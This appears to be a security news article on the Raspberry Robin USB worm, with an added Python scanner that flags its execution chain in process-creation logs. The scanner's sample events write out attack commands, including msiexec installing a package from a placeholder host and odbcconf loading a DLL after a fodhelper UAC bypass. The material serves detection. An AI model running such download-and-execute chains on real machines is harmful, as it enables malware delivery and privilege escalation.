Raspberry Robin worm is seen delivering malware via Windows Installer

May 18, 2022

New malware with worm capabilities was recently found on Windows machines, distributed via external flash drives. Researchers report that the new malware is associated with the Raspberry Robin worm they first identified last September.

The sectors most targeted by the worm are manufacturing and technology, with multiple customers’ networks already infected. The worm activates when an infected USB drive is connected to a Windows machine: it then uses cmd.exe to launch a malicious file stored on the compromised flash drive.

The Raspberry Robin worm abuses the Microsoft Standard Installer (msiexec.exe) to communicate with its operators’ command-and-control servers. While msiexec downloads and launches multiple installer packages, the operators deliver further malware to the targeted machine.


Experts have yet to identify which methods the Raspberry Robin worm uses to establish persistence.

However, they presume that the malware mounts a malicious DLL on infected machines so that it survives a system restart.

The malicious DLLs are launched through two Windows utilities, fodhelper and odbcconf. The first, fodhelper, lets the DLL evade User Account Control; the second launches and configures the DLL.
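The execution chain described above (cmd.exe launching a file from the USB drive, msiexec.exe fetching packages from a remote server, then fodhelper.exe and odbcconf.exe loading a DLL) leaves a distinctive trail in process-creation telemetry. The following is an added defensive example, not code from the original article or from the researchers it cites: a small Python scanner that applies four heuristics to constructed, Sysmon-style process-creation events. The sample events, the drive letter, file names and the `example-c2.invalid` host are placeholders made up for this example, and the assumptions that the system drive is `C:`, that `odbcconf.exe` loading a DLL shows a `regsvr` argument, and that `fodhelper.exe` (an auto-elevating Windows binary) normally spawns no child processes are general knowledge about those utilities, not details taken from the page.

```python
"""Heuristic detection of the Raspberry Robin execution chain over
constructed process-creation events (added example, not vendor code)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record, modelled on Sysmon Event ID 1 fields."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample events, not real telemetry. Drive letter E:, file names
# and the host example-c2.invalid are placeholders chosen for this example.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c start E:\recovery.lnk"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /q /i http://example-c2.invalid/pkg.msi"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\fodhelper.exe",
              r"fodhelper.exe"),
    ProcEvent(r"C:\Windows\System32\fodhelper.exe", r"C:\Windows\System32\odbcconf.exe",
              r"odbcconf.exe /a {regsvr C:\ProgramData\placeholder.dll}"),
    # Benign noise that must not alert: a local MSI install and a service host.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\alice\Downloads\tool.msi"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              r"svchost.exe -k netsvcs"),
]

URL_RE = re.compile(r"https?://", re.I)
# Assumption: C: is the system drive, so any other drive letter in a cmd.exe
# command line is treated as removable or external media.
REMOVABLE_RE = re.compile(r"\b[D-Z]:\\", re.I)
DLL_LOAD_RE = re.compile(r"regsvr", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every heuristic this single event triggers."""
    hits = []
    img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.command_line
    # Stage 1: cmd.exe launching something from a non-system drive.
    if img == "cmd.exe" and REMOVABLE_RE.search(cl):
        hits.append("cmd_from_removable")
    # Stage 2: msiexec.exe pointed at a remote package rather than a local file.
    if img == "msiexec.exe" and URL_RE.search(cl):
        hits.append("msiexec_remote_package")
    # Stage 3: odbcconf.exe used to load a DLL.
    if img == "odbcconf.exe" and DLL_LOAD_RE.search(cl):
        hits.append("odbcconf_dll_load")
    # Stage 4: fodhelper.exe acting as a parent process at all (assumption:
    # it normally spawns no children, so any child is worth a look).
    if parent == "fodhelper.exe":
        hits.append("fodhelper_spawned_child")
    return hits


def scan(events: list[ProcEvent]) -> tuple[list[tuple[str, str]], bool]:
    """Run every heuristic over the events.

    Returns (alerts, chain_seen): alerts is a list of (rule, command_line)
    pairs, and chain_seen is True when at least three distinct stages fired,
    which is the signal that the whole chain, not a lone false positive,
    was observed.
    """
    alerts = [(rule, ev.command_line) for ev in events for rule in classify(ev)]
    distinct_stages = {rule for rule, _ in alerts}
    return alerts, len(distinct_stages) >= 3


if __name__ == "__main__":
    found, chain = scan(SAMPLE_EVENTS)
    for rule, cmd in found:
        print(f"{rule:26} {cmd}")
    print("full chain observed:", chain)
```

Each rule on its own is noisy (msiexec fetching a package over HTTP is legitimate in some environments), which is why `scan` only reports a chain when several distinct stages appear; in a real deployment the correlation should also be bounded by host and time window.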

Despite an in-depth assessment of the Raspberry Robin worm, security analysts are still left with open questions. It is still unknown how the worm infects the external USB drives that start its activity, and the purpose of the mounted malicious DLLs is also unclear.

As a working hypothesis, the analysts suggest that the threat operators may be using the USB drives to establish persistence in the infected networks. They are still assessing the worm’s activity and working to understand the goals of its operators.
